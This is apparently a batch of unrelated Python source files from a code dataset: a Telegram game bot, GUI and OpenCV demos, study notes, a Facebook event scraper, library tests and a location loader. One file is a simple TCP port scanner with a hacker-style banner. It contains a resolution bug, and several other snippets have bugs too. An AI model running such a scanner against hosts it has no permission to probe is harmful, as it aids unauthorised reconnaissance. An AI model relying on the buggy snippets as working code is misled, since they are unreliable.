main_bot:\n msg += \"@werewolfbot\"\n elif user == beta_bot:\n msg += \"@werewolfbot\"\n message.reply_text(msg, quote=False)\n except Exception as e:\n print(e)\n self.set_group_state('idle')\n\n def game_finish_db(self, message):\n data_database_queries.finish_game(self.id)\n try:\n users = [self.UserData(entity.user.id, entity.user.first_name) for entity in message.entities\n if entity.type in ('mention', 'text_mention')]\n for user in users:\n try:\n r = self.client.get_chat_member(self.id, user.user)\n user.status = r.status\n except UserNotParticipant as e:\n user.status = 'left'\n except:\n user.status = 'Error'\n print('game finish db start save')\n data_database_queries.define(message.text, users, self.id, message.message_id)\n data_database_queries.define_winner(message)\n print('game finish db end save')\n except Exception as e:\n log_to_lab(str(self.id) + ' failed on adding')\n log_to_lab(' '.join(e.args))\n log_to_lab(message.text.markdown)\n\n def cancel_game(self, message):\n settings = self.setting\n if settings and not Chat.is_spy(self.client):\n if self.id in helper_database_queries.manager_chats:\n message.reply_text(\"/tag_del@manage_ww_bot\", quote=False)\n self.delete_join_link()\n data_database_queries.cancel_game(self.id)\n self.set_group_state('idle')\n\n def grey_next(self, message):\n msg_id = message.message_id\n rep = message.reply_to_message\n if rep.text and not Chat.is_spy(self.client):\n if rep.from_user.is_self:\n if rep.text == '#next':\n settings = self.setting\n if (settings and settings.game_started_pin) or not settings:\n try:\n time.sleep(4)\n try:\n rs_bot.pin_chat_message(self.id, msg_id, disable_notification=True)\n except Exception as e:\n print(e)\n message.reply_text(\"/pin@ExecutrixBot\")\n except FloodWait as e:\n pass\n\n def add_gp(self, message):\n title = message.chat.title\n text = message.text\n link = text.replace('add gp ', '').replace('Add gp', '')\n if link:\n try:\n group_title = self.client.get_chat(link).title\n except:\n message.reply_text('لینک داده شده معتبر نمیباشد')\n return\n if title != group_title:\n message.reply_text('لینک داده شده برای این گروه نمیباشد')\n return\n admins = self.client.get_chat_members(self.id, filter='administrators')\n creator = None\n for admin in admins:\n if admin.status == 'creator':\n creator = admin.user.id\n helper_database_queries.add_group(self.id, title, creator, link)\n message.reply_text('گروه نصب شد', quote=False)\n else:\n message.reply_text('لینک و یادت رفت بزاری')\n\n def add_message_as_mention(self, message):\n message_id = message.message_id\n user_id = message.from_user.id\n entities = message.entities\n if entities and not Chat.is_spy(self.client):\n group_info = data_database_queries.get_group_status(self.id)\n if group_info:\n if group_info == 'idle':\n status = 0\n elif group_info =='ingame':\n status = 2\n elif group_info == 'jointime':\n status = 1\n else:\n status = 0\n else:\n return\n if status == 1:\n entity_length = 0\n message_length = len(message.text)\n for entity in entities:\n if entity['type'] in ['text_mention', 'mention']:\n entity_length += entity['length']\n if entity_length / message_length >= 0.4:\n data_database_queries.add_message_for_delete_database(message_id, self.id, user_id)\n\n def save_game_link(self, message):\n user_id = message.from_user.id\n try:\n url = message.click(0)\n ali_db.add_start(self.id, url, user_id)\n except ValueError as e:\n pass\n except Exception as e:\n log_to_lab(' '.join(e.args))\n\n def save_afk(self, message):\n afked_players = list(set([ent.user.id for ent in message.entities if ent.type == 'text_mention']))\n [data_database_queries.save_afk(self.id, u) for u in afked_players]\n if self.id == -1001476763360:\n try:\n [data_database_queries.save_afk_lu(u, message.message_id) for u in afked_players]\n except:\n pass\n\n def save_vote(self, message):\n votes = [ent.user.id for ent in message.entities if ent.type == 'text_mention']\n tmp = []\n for vote in votes:\n tmp.append(vote)\n if len(tmp) == 2:\n voter, voted = tmp\n data_database_queries.save_vote(self.id, voter, voted)\n tmp = []\n","sub_path":"src/app/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":11793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"403104472","text":"from tkinter import *\nimport sqlite3\n\nwindow = Tk()\n#create a database table\n\ndef create_table():\n conn=sqlite3.connect(\"book.db\")\n cur=conn.cursor()\n cur.execute(\"CREATE TABLE IF NOT EXISTS book (item TEXT,type TEXT,language TEXT, deadline INTEGER)\")\n conn.commit()\n conn.close()\n\ndef insert(item,type,language,deadline):\n conn=sqlite3.connect(\"book.db\")\n cur=conn.cursor()\n cur.execute(\"INSERT INTO book VALUES (?,?,?,?),(item,type,language,deadline)\")\n conn.commit()\n conn.close()\n\n\n\n","sub_path":"Booklist1/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"460094203","text":"# INF552 HW4\r\n# Shih-Yu Lai 7183984563\r\n# Shiuan-Chin Huang 9815633745\r\n\r\nimport numpy as np\r\n\r\ndef readFile():\r\n XY = np.array\r\n Z = np.array\r\n data = np.loadtxt(\"linear-regression.txt\", dtype=\"float\", delimiter=\",\")\r\n XY = np.array(data[:, 0:2]) # store X and Y, ex: [0.6937807956355748, 0.69754351093898]\r\n Z = np.array(data[:, 2]) # store Z, ex: 3.2522896815114373, ...\r\n return XY, Z\r\n\r\n\r\ndef main():\r\n XY, Z = readFile()\r\n m, n = XY.shape # get the m*n number\r\n bias = np.ones((m, 1))\r\n XY = np.concatenate((bias, XY), axis = 1)\r\n XY_T = np.linalg.inv(np.dot(XY.T, XY))\r\n weights = np.dot(XY_T, np.dot(XY.T, Z))\r\n print(\"intercept : \" + str(weights[0]))\r\n print(\"weights: \" + str(weights[1:]))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"Inf552_HW4/linearRegression.py","file_name":"linearRegression.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"303038896","text":"'''\nfrom opencv.org tutorials\nhttps://docs.opencv.org/4.5.2/dc/da5/tutorial_py_drawing_functions.html\n\nDrawing funciton in opencv\n\n'''\n\n\nimport numpy as np\nimport cv2 as cv\n\n# Create a black image\nimg = np.zeros((512, 512, 3), np.uint8)\n\n# Draw a diagonal blue line with thickness of 5 px\ncv.line(img, (0, 0), (511, 511), (255, 0, 0), 5)\n\n# Drawing Rectangle\ncv.rectangle(img, (348, 0), (510, 128), (0, 255, 0), 3)\n\n# Drawing Circle\ncv.circle(img, (447, 63), 63, (0,0,225), -1)\n\n# Drawing Ellipse\n# cv.ellipse(img, (256, 256), (100, 50), 0, 0,180, 255, -1)\ncv.ellipse(img, (256, 256), (100, 50), 0, 0,180, (0, 255, 0), -1)\n\n# Drawing Polygon\npts = np.array([[10,5], [20,30], [70,20], [50,10]], np.int32)\npts = pts.reshape((-1,1,2))\n# cv.polylines(img, [pts], True, (0,225,255))\ncv.polylines(img, [pts], False, (0,225,255))\n\n\nfont = cv.FONT_HERSHEY_SIMPLEX\n# cv.putText(img, 'OpenCV', (10,500), font, 4, (255, 255, 255), 2, cv.LINE_AA)\ncv.putText(img, 'fucking the word', (10,500), font, 1, (255, 255, 255), 2, cv.LINE_AA)\n\n\n\n\n\n# 辅助保存图片代码\ncv.imshow(\"draw img window\", img)\nk = cv.waitKey(0)\nif k == ord(\"s\"):\n cv.imwrite('image5.jpg', img)\n cv.destoryAllWindows()\nelif k == ord('q'):\n cv.destoryAllWindows()\n\n\n\n\n\n\n\n","sub_path":"opencv_test/drawFun.py","file_name":"drawFun.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"398892247","text":"from tkinter import *\nfrom PIL import ImageTk\nimport PIL.Image\nimport src.video as vi\nimport src.webcam as we\nfrom tkinter import filedialog\nimport src.report as re \n\nHEIGHT = 1000\nWIDTH = 1000\nwindow = Tk()\nwindow.title(\"ALMA share\")\ncanvas = Canvas(window, height=HEIGHT, width=WIDTH)\ncanvas.pack()\nicon = PIL.Image.open(\"./images/icon.png\")\n\n# background\nimage = PIL.Image.open(\"./images/second.jpg\")\nbackground_image = ImageTk.PhotoImage(image)\nbackground_label = Label(window, image=background_image)\nbackground_label.place(relwidth=1, relheight=1)\n\n# title\nlabel = Label(window, text=\"ALMA\",bg='#94b1ee',fg=\"black\", width=200, font='Escalope 65 bold')\nlabel.place(relx=0.5, rely=0.13, relwidth=1, relheight=0.15, anchor='n')\n#label.config(font=(\"bold\", 50))\n\n# facial emotion recognition\nlabel = Label(window, text=\"facial emotion recognition\", fg=\"black\",\n bg='#ffda00', width=200, font=\"Comfortaa 14 bold\")\nlabel.place(relx=0.5, rely=0.23, relwidth=0.3, relheight=0.04, anchor='n')\n\n# choose\nlabel = Label(window, text=\"Choose your own path\", fg=\"black\",\n bg='#94b1ee', width=200, font=\"Comfortaa 14 bold\")\nlabel.place(relx=0.5, rely=0.40, relwidth=0.75, relheight=0.05, anchor='n')\n\n# button - webcam\nframe = Frame(window, bg='#94b1ee', bd=5)\nframe.place(relx=0.3125, rely=0.45, relwidth=0.375,\n relheight=0.1, anchor='n')\n\n\nbutton = Button(frame, cursor=\"heart\", text=\"Webcam\", font=\"Comfortaa 18 bold\",command=lambda: we.webcam(counttoclose=0, idvideo=67))\nbutton.place(relx=0, relheight=1, relwidth=1)\nbutton.configure(foreground='black', relief='groove')\n\n\n# button - video\nframe = Frame(window, bg='#94b1ee', bd=5)\nframe.place(relx=0.6875, rely=0.45, relwidth=0.375,\n relheight=0.1, anchor='n')\n\nbutton = Button(frame, cursor=\"heart\", text=\"Video\", font=\"Comfortaa 18 bold\", command=lambda: vi.video(idvideo=69))\nbutton.place(relx=0, relheight=1, relwidth=1)\nbutton.configure(foreground='black', relief='groove')\n\n# separator\nlabel = Label(window, bg='black', width=200)\nlabel.place(relx=0.5, rely=0.5525, relwidth=0.75, relheight=0.005, anchor='n')\n\n#thank you\nlabel = Label(window, text=\"Thank you for using our services\", fg=\"black\",\n bg='#94b1ee', width=200, font=\"Comfortaa 12 bold\")\nlabel.place(relx=0.5, rely=0.56, relwidth=0.75, relheight=0.05, anchor='n')\n\nlabel = Label(window, text=\"If you would like to get a report of what you've just seen, press the button below\", fg=\"black\",\n bg='#94b1ee', width=200, font=\"Comfortaa 10 bold\")\nlabel.place(relx=0.5, rely=0.60, relwidth=0.75, relheight=0.05, anchor='n')\n\n# button - report\nframe = Frame(window, bg='#94b1ee', bd=5)\nframe.place(relx=0.5, rely=0.65, relwidth=0.75,\n relheight=0.1, anchor='n')\n\n\nbutton = Button(frame, cursor=\"heart\", text=\"Get your report\", font=\"Comfortaa 18 bold\",command=lambda: re.getReport(idvideo=69))\nbutton.place(relx=0, relheight=1, relwidth=1)\nbutton.configure(foreground='black', relief='groove')\n\nwindow.mainloop()","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"144799528","text":"# list []\n# 여러 데이터를 동시 저장 가능한 자료구조, 대괄호 [] 사용하며 0개 이상 원소 저장\n# 인덱스로 특정 요소에 접근 가능 -> (for문을 이용해 데이터 추출 가능)\n# 데이터 변경이 가능한 mutable 한 리스트\n# 대괄호 안에 : 으로 시작, 끝 인덱스를 설정 가능\n# 끝 인덱스는 실제 인덱스보다 1을 크게 더 설정\n# list는 딕셔너리의 key값(해쉬)으로 쓸 수 없지만 tuple은 가능 (딕셔너리의 키값은 불변한 값만 올 수 있기 때문)\n\n#리스트 초기화\nlist1 = [1, 2, 3, 'sdf', ['a', 'b', True]]\nlist2 = [0, 5]\n\n# [:] -> 전체, [0:] -> 0부터 끝까지, [:4] 4개 count까지\nprint(\"리스트 인덱싱 출력\", list1[:-1])\n\n# 크기가 n이고, 모든 값이 1인 1차원 리스트 초기화\nn = 5\nexam_list = [1] * n\nprint(exam_list)\n\n# list와 tuple의 차이 -> immutable(변), mutable(불변), 속도 : list < tuple\n\n# dic {}\n# 중괄호를 사용 {}\n# 자바의 map과 유사한 자료형으로 key : value 1:1 대응 형태의 자료구조\n# 하나의 키값엔 하나의 value만 대응, key값은 변경이 불가하지만, value는 변경이 가능\ndic = {'name': 'lion', 'age': 1}\ndic2 = dict(name='lion', age=1)\n\ndic['sex'] = 'male' # 추가\n# print(dic.get('name'))\ndel dic['name']\ndic.clear()\n# print(dic2.get('name')) # 'lion'\n# print('name' in dic2) # True\n\n# tuple\n# 여러 데이터를 동시 저장 가능한 자료구조, 소괄호() 사용하며 0개 이상 원소 저장\n# 인덱스로 특정 요소에 접근 가능 -> (for문을 이용해 데이터 추출 가능)\n# 데이터 변경이 불가능한 immutable 한 리스트 (# TypeError: 'tuple' object does not support item assignment)\n\ntuple1 = (1, \"tuple_study\")\ntuple2 = (3, 4.22)\ntuple3 = tuple1 + tuple2\ntuple4 = tuple1 * 5\n\ntt = ('a',)+(1231923,) + tuple1[1:]\nprint(tt)\n\nprint(tuple1)\n# # tuple1[0] = 2 에러 변경 불가\n# print(tuple1)\nprint(tuple2)\nprint(tuple3)\nprint(tuple4)\n\n\n# 리스트 slice, remove(인자와 같은 첫번째 데이터를 찾아서 제거) del, pop(인자로 받은 인덱스 데이터를 제거)\na = [1, 2, 1, 3, 4, 5, 1]\nb = [1, 2, 1, 3, 4, 5, 1]\n\na.remove(1)\n# pop : 지워진 인덱스의 데이터값을 변수로 반환하지만, del은 반환하지 않음 -> del이 pop보다 수행속도가 미세하게 빠름\nremoved = b.pop(1)\nprint(\"remove a : \", a)\n\nprint(\"removed : \", removed)\nprint(\"pop b : \", b)\n","sub_path":"python_grammer_example/basic_structure.py","file_name":"basic_structure.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"98864273","text":"##############################################\n## Author: I-No Liao ##\n## Date of update: 2018/10/08 ##\n## Description: Leetcode #071 ##\n##############################################\n\n# Given an absolute path for a file (Unix-style), simplify it. \n# For example,\n# path = \"/home/\", => \"/home\"\n# path = \"/a/./b/../../c/\", => \"/c\"\n# path = \"/a/../../b/../c//.//\", => \"/c\"\n# path = \"/a//b////c/d//././/..\", => \"/a/b/c\"\n# \n# In a UNIX-style file system, a period ('.') refers to the current directory, so it can be ignored in a simplified path. Additionally, a double period (\"..\") moves up a directory, so it cancels out whatever the last directory was. For more information, look here: https://en.wikipedia.org/wiki/Path_(computing)#Unix_style\n# Corner Cases:\n# \n# Did you consider the case where path = \"/../\"?\n# In this case, you should return \"/\".\n# Another corner case is the path might contain multiple slashes '/' together, such as \"/home//foo/\".\n# In this case, you should ignore redundant slashes and return \"/home/foo\".\n\n# I-No\n# Time: O(n)\nclass Solution:\n # @param path: str\n # @return str\n def simplifyPath(self, path):\n # Get element\n element = []\n temp = ''\n for char in path:\n if char == '/':\n if not temp:\n continue\n else:\n if temp != '.': \n element.append(temp)\n temp = ''\n else:\n temp += char\n if temp and temp != '.':\n element.append(temp)\n \n # Get answer\n ans = []\n for s in element:\n if s != '..':\n ans.append(s)\n elif ans:\n ans.pop()\n return '/' + '/'.join(ans)\n\n# I-No\n# Time: O(n)\n# Use string split function\nclass Solution_2:\n # @param path: str\n # @return str\n def simplifyPath(self, path):\n # Get element\n path = path.split('/')\n path = [x for x in path if x != '.' and x != '']\n # Get answer\n ans = []\n for s in path:\n if s != '..':\n ans.append(s)\n elif ans:\n ans.pop()\n return '/' + '/'.join(ans)\n\n# Main\nif __name__ == '__main__':\n path = '/home/'\n print(Solution().simplifyPath(path))\n path = '/a/./b/../../c/'\n print(Solution().simplifyPath(path))\n path = '/a/../../b/../c//.//'\n print(Solution().simplifyPath(path))\n path = '/a//b////c/d//././/..'\n print(Solution().simplifyPath(path))\n path = '/../'\n print(Solution().simplifyPath(path))\n path = '/...'\n print(Solution().simplifyPath(path))\n path = '/.'\n print(Solution().simplifyPath(path))\n","sub_path":"071_SimplifyPath.py","file_name":"071_SimplifyPath.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"150635290","text":"from rest_framework import serializers\nfrom produtos.models import Produto\nfrom produtos.serializers import ProdutoSerializer\nfrom vendas.models import Venda\nfrom decimal import Decimal\n\nclass ProdutoLigthSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n nome = serializers.CharField(read_only=True)\n\nclass VendaSerializer(serializers.Serializer):\n produto = ProdutoLigthSerializer()\n desconto = serializers.IntegerField()\n valor_total = serializers.DecimalField(max_digits=10, decimal_places=2, read_only=True)\n forma_pagamento = serializers.ChoiceField(choices=Venda.formas_pagamento)\n\n def create(self, validated_data):\n produto_data = validated_data.pop('produto')\n produto = Produto.objects.get(id=produto_data['id'])\n desconto = validated_data.get('desconto')\n valor_total = Decimal(float(produto.valor) *(1- desconto / 100))\n\n venda = Venda.objects.create(\n produto=produto, \n valor_total=valor_total, \n **validated_data\n )\n return venda","sub_path":"vendas/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"489345995","text":"from leechers.platformleecher import PlatformLeecher\nimport facebook\nfrom os import remove\nfrom dateparser import parse as dateparse\nfrom datetime import datetime\nfrom requests import exceptions\nfrom pandas import Timestamp\n\n\nclass FacebookEventLeecher(PlatformLeecher):\n def __init__(self, root=\"./leechers/resources/\"):\n super().__init__(root=root)\n with open(root + \"facebook_access_token.txt\") as f:\n fb_token = f.read()\n self.graph = facebook.GraphAPI(access_token=fb_token, version=2.10)\n self.platform = \"facebook\"\n try:\n remove(\"facebook_errors.txt\")\n except FileNotFoundError:\n pass\n\n def set_events_for_identifier(self, band, mbid, url):\n page_label = url.split(\"/\")[-1].split(\"-\")[-1] if \"-\" in url.split(\"/\")[-1] else url.split(\"/\")[-1]\n print(page_label)\n try:\n events = self.graph.get_connections(id=page_label, connection_name=\"events\")\n print(events)\n if \"data\" in events:\n for concert in events[\"data\"]:\n self.events.append(self.map_platform_to_schema(concert, band, mbid, {\"page_label\": page_label}))\n except facebook.GraphAPIError as e:\n with open(\"resources/facebook_errors.txt\", \"a\") as f:\n f.write(datetime.now().date().isoformat() + \"\\t\" + url + \"\\t\" + str(e) + \"\\n\")\n except exceptions.ConnectionError:\n self.set_events_for_identifier(band, mbid, url)\n\n def map_platform_to_schema(self, concert, band, mbid, other):\n venue = concert[\"place\"][\"name\"] if \"place\" in concert else None\n stad = concert[\"place\"][\"location\"][\"city\"] if \"place\" in concert and \"location\" in concert[\"place\"] and \"city\" in concert[\"place\"][\"location\"] else None\n state = concert[\"place\"][\"location\"][\"state\"] if \"place\" in concert and \"location\" in concert[\"place\"] and \"state\" in concert[\"place\"][\"location\"] else None\n land = concert[\"place\"][\"location\"][\"country\"] if \"place\" in concert and \"location\" in concert[\"place\"] and \"country\" in concert[\"place\"][\"location\"] else None\n if state is not None and stad is not None and land in [\"United States\", \"Brazil\", \"Canada\", \"Australia\"]:\n stad = stad + \", \" + state\n einddatum = Timestamp(dateparse(concert[\"end_time\"]).date()) if \"end_time\" in concert else None\n return {\n \"titel\": concert[\"name\"] if \"name\" in concert else None,\n \"titel_generated\": str(band) + \" @ \" + str(venue) + \" in \" + str(stad) + \", \" + str(land),\n \"datum\": Timestamp(dateparse(concert[\"start_time\"]).date()),\n \"einddatum\": einddatum,\n \"event_type\": \"festival\" if einddatum else None,\n \"artiest\": band,\n \"artiest_id\": \"facebook_\" + other[\"page_label\"],\n \"artiest_mb_naam\": band,\n \"artiest_mb_id\": mbid,\n \"stad\": stad,\n \"land\": land,\n \"venue\": venue,\n \"latitude\": concert[\"place\"][\"location\"][\"latitude\"] if \"place\" in concert and \"location\" in concert[\"place\"] and \"latitude\" in concert[\"place\"][\"location\"] else None,\n \"longitude\": concert[\"place\"][\"location\"][\"longitude\"] if \"place\" in concert and \"location\" in concert[\"place\"] and \"longitude\" in concert[\"place\"][\"location\"] else None,\n \"source\": self.platform,\n \"event_id\": \"facebook\" + concert[\"id\"]\n }\n","sub_path":"leechers/facebookleecher.py","file_name":"facebookleecher.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"578279649","text":"import pyfiglet\r\nimport sys\r\nimport socket\r\nfrom datetime import datetime\r\n\r\nBanner = pyfiglet.figlet_format(\"Dark Dante \")\r\nprint(Banner)\r\n\r\n# Defining a Target\r\n\r\nif len(sys.argv) == 2:\r\n\r\n # Host name to a IPv4\r\n target = socket.gethostname(sys.argv[1])\r\n\r\nelse:\r\n print(\"Invalid Amount of Argument \")\r\n\r\nprint(\" - \" * 50)\r\nprint(\" Scanning Target \"+target)\r\nprint(\" Scanning Started at: \" + str(datetime.now()))\r\nprint(\" - \" * 50)\r\n\r\n# Scan ports between 1 to 65,535\r\n\r\ntry:\r\n for port in range(1, 100):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n socket.setdefaulttimeout(1)\r\n\r\n # returns an error indicator\r\n\r\n Banner = s.connect_ex((target, port))\r\n if Banner == 0:\r\n print(\"Port {} is open \".format(port))\r\n s.close()\r\n\r\nexcept KeyboardInterrupt:\r\n\r\n print(\" \\n Exitting Program ! ! ! \")\r\n sys.exit()\r\n\r\nexcept socket.gaierror:\r\n\r\n print(\" \\n Hostname Could Not Be Resolved ! ! ! \")\r\n sys.exit()\r\n\r\nexcept socket.error:\r\n\r\n print(\" \\n Server not Responding ! ! ! \")\r\n sys.exit()\r\n","sub_path":"PortCreator.py","file_name":"PortCreator.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"304799492","text":"import errno\nimport os\n\nfrom atomicwrites import atomic_write\n\nimport pytest\n\n\ndef test_atomic_write(tmpdir):\n fname = tmpdir.join('ha')\n for i in range(2):\n with atomic_write(str(fname), overwrite=True) as f:\n f.write('hoho')\n\n with pytest.raises(OSError) as excinfo:\n with atomic_write(str(fname), overwrite=False) as f:\n f.write('haha')\n\n assert excinfo.value.errno == errno.EEXIST\n\n assert fname.read() == 'hoho'\n assert len(tmpdir.listdir()) == 1\n\n\ndef test_teardown(tmpdir):\n fname = tmpdir.join('ha')\n with pytest.raises(AssertionError):\n with atomic_write(str(fname), overwrite=True):\n assert False\n\n assert not tmpdir.listdir()\n\n\ndef test_replace_simultaneously_created_file(tmpdir):\n fname = tmpdir.join('ha')\n with atomic_write(str(fname), overwrite=True) as f:\n f.write('hoho')\n fname.write('harhar')\n assert fname.read() == 'harhar'\n assert fname.read() == 'hoho'\n assert len(tmpdir.listdir()) == 1\n\n\ndef test_dont_remove_simultaneously_created_file(tmpdir):\n fname = tmpdir.join('ha')\n with pytest.raises(OSError) as excinfo:\n with atomic_write(str(fname), overwrite=False) as f:\n f.write('hoho')\n fname.write('harhar')\n assert fname.read() == 'harhar'\n\n assert excinfo.value.errno == errno.EEXIST\n assert fname.read() == 'harhar'\n assert len(tmpdir.listdir()) == 1\n\n\n# Verify that nested exceptions during rollback do not overwrite the initial\n# exception that triggered a rollback.\ndef test_open_reraise(tmpdir):\n fname = tmpdir.join('ha')\n with pytest.raises(AssertionError):\n aw = atomic_write(str(fname), overwrite=False)\n with aw:\n # Mess with internals, so commit will trigger a ValueError. We're\n # testing that the initial AssertionError triggered below is\n # propagated up the stack, not the second exception triggered\n # during commit.\n aw.rollback = lambda: 1 / 0\n # Now trigger our own exception.\n assert False, \"Intentional failure for testing purposes\"\n\n\ndef test_atomic_write_in_pwd(tmpdir):\n orig_curdir = os.getcwd()\n try:\n os.chdir(str(tmpdir))\n fname = 'ha'\n for i in range(2):\n with atomic_write(str(fname), overwrite=True) as f:\n f.write('hoho')\n\n with pytest.raises(OSError) as excinfo:\n with atomic_write(str(fname), overwrite=False) as f:\n f.write('haha')\n\n assert excinfo.value.errno == errno.EEXIST\n\n assert open(fname).read() == 'hoho'\n assert len(tmpdir.listdir()) == 1\n finally:\n os.chdir(orig_curdir)\n","sub_path":"contrib/python/atomicwrites/tests/test_atomicwrites.py","file_name":"test_atomicwrites.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"176889899","text":"import json\nimport logging\nimport os\nimport re\n\nimport spacy\nimport tqdm\n\nimport utils\n\nlogger = logging.getLogger(__name__)\nFILE_PATH = os.path.dirname(os.path.realpath(__file__))\n\n\n# avoid = set(json.load(open(os.path.join(FILE_PATH,\"obj\",\"avoid_locations.json\"),'r')))\n\n# avoid = [a.lower() for a in avoid]\n\n# print(\"Loading locations\")\n#\n\ndef combine(lst, num):\n logger.info('')\n \"\"\"\n Takes in a list\n [1,2,3,4,5]\n and based on the num returns all possible neighbouring pairs\n [[1,2],[2,3],[3,4],[4,5]].\n :param lst: input list\n :param num: number of neighbouring pairs\n :return: list.\n \"\"\"\n if len(lst) < num:\n raise Exception(\"Cannot have more neighbours than length of list.\")\n out = []\n for i in range(len(lst) - num + 1):\n out.append(lst[i:i + num])\n return out\n\n\ndef string_combinations(string, max_words):\n logger.info('')\n \"\"\"\n Takes a string text and creates a list of all possible neighbouring strings.\n :param string: Input string\n :param max_words: Number of neighbouring strings\n :return: list\n \"\"\"\n if max_words == 0:\n return None\n s = re.findall(r\"[\\w']+\", string)\n r = combine(s, max_words)\n return [utils.clean_string(' '.join(a)) for a in r]\n\n\ndef all_combinations(string, max_words):\n logger.info('')\n \"\"\"\n Creates list of i=1, i=2, i=3, to i=max_words combinations of words in string.\n :param string: String text\n :param max_words: Integer number of max neighbouring words.\n :return: List of all combinations.\n \"\"\"\n out = []\n i = 0\n while i < max_words:\n i += 1\n out = out + string_combinations(string, i)\n return out\n\n\ndef all_stopwords():\n logger.info('')\n \"\"\"\n Gets stopwords from json file.\n :return: set of stopwords\n \"\"\"\n sws = json.loads(open(os.path.join(FILE_PATH, \"obj\", 'stopwords-all.json'), 'rb').read())\n out = [sws[a] for a in sws]\n sws = []\n for l in out:\n sws += l\n sws = set(sws)\n return sws\n\n\ndef all_english_words():\n logger.info('')\n words = [w.split(',')[0].replace('\"', '').lower()\n for w in open(os.path.join(FILE_PATH, \"obj\", 'dictionary.csv'), 'r').readlines()]\n return set(words)\n\n\n# noinspection PyShadowingNames\ndef all_surnames():\n logger.info('')\n surnames = [w.split(',')[0].lower()\n for w in open(os.path.join(FILE_PATH, \"obj\", 'surnames.csv'), 'r').readlines()]\n return set(surnames)\n\n\n# noinspection PyShadowingNames\ndef all_firstnames():\n logger.info('')\n firstnames = [w.split(',')[0].lower()\n for w in open(os.path.join(FILE_PATH, \"obj\", 'first_names.csv'), 'r').readlines()]\n return set(firstnames)\n\n\n# english_words = all_english_words()\n# stopwords = all_stopwords()\n# surnames = all_surnames()\n# firstnames = all_firstnames()\n\nclass LocationLoader:\n \"\"\"\n Geoextraction class that loads location data from files and puts them into RAM.\n \"\"\"\n\n def __init__(self):\n logger.info('')\n self.lookup_id = 0\n self.locations, self.locations_lookup, self.countries_cca2 = self.load_locations()\n self.locations_lookup_set = set(self.locations_lookup.keys())\n\n def load_locations(self):\n logger.info('')\n \"\"\"\n Function that loads countries, cities and states from files and returns two dictionaries:\n First dictionary:\n -keys are lookup ids\n -values are location data (common name, latitude, longtitude, population, type [country, city, state])\n Second dictionary:\n -keys are all different location names (UK, United Kingdom, England, f.e.)\n -values are lookup ids\n\n This enables fast checking if a random word is in fact a location (using common set elements),\n and in-turn fast lookup using the lookup id.\n :return:\n \"\"\"\n print(\"Loading locations...\")\n countries, countries_lookup, countries_cca2 = self.load_countries()\n # print()\n cities, cities_lookup = self.load_cities()\n states, states_lookup = self.load_states()\n location_dict = {**cities, **states, **countries}\n lookup_dict = {**cities_lookup, **states_lookup, **countries_lookup}\n lookup_dict = {k.lower(): v for k, v in lookup_dict.items()}\n\n del (lookup_dict[\"\"]) # TODO: Fix this (better parsing)\n print(\"...Done!\")\n\n return location_dict, lookup_dict, countries_cca2\n\n def load_countries(self):\n logger.info('')\n \"\"\"\n Loads countries from file and generates two dictionaries.\n First dictionary:\n -keys are lookup ids\n -values are location data\n Second dictionary:\n -keys are all different location names\n -values are lookup ids\n :return: dict, dict\n \"\"\"\n countries = {}\n countries_lookup = {}\n countries_cca2 = {}\n f = open(os.path.join(FILE_PATH, 'obj', 'countries.json'), 'r', encoding='utf-8').read()\n j = json.loads(f)\n for c in j:\n self.lookup_id += 1\n if len(c['latlng']) > 0:\n lat, lng, cca2, cca3 = c['latlng'][0], c['latlng'][1], c['cca2'], c['cca3']\n countries[self.lookup_id] = {'location': c['name']['common'], 'lat': lat, 'lng': lng,\n 'type': 'country', 'area': c['area']}\n # print(c['name']['common'])\n for k, v in c['name'].items():\n if isinstance(v, dict):\n for k1, v1 in v.items():\n for k2, v2 in v1.items():\n countries_lookup[v2] = self.lookup_id\n else:\n # print(\" \"+v)\n countries_lookup[v] = self.lookup_id\n for n in c['altSpellings']:\n countries_lookup[n] = self.lookup_id\n\n countries_cca2[cca2] = self.lookup_id\n # else:\n # logger.warning(\"country \"+c['name']['common']+' has no latlng')\n return countries, countries_lookup, countries_cca2\n\n def load_cities(self, min_population=0):\n logger.info('')\n \"\"\"\n Loads cities from file and generates two dictionaries.\n First dictionary:\n -keys are lookup ids\n -values are location data\n Second dictionary:\n -keys are all different location names\n -values are lookup ids\n :return: dict, dict\n \"\"\"\n f = open(os.path.join(FILE_PATH, 'obj', 'cities1000.txt'), 'r', encoding='utf-8')\n cities = {}\n cities_lookup = {}\n for l in f.readlines():\n split = l.split(';')\n go = False\n population, lat, lng, ascii_name, alternate_names, admin_region, name, country_code = None, None, None, None, None, None, None, None\n if len(split) == 19:\n idn, name, ascii_name, alternate_names, lat, lng, feat_class, feat_code, \\\n country_code, a1, a2, a3, a4, a5, population, dem, elevation, admin_region, mod_date = split\n go = True\n elif len(split) == 17:\n idn, name, 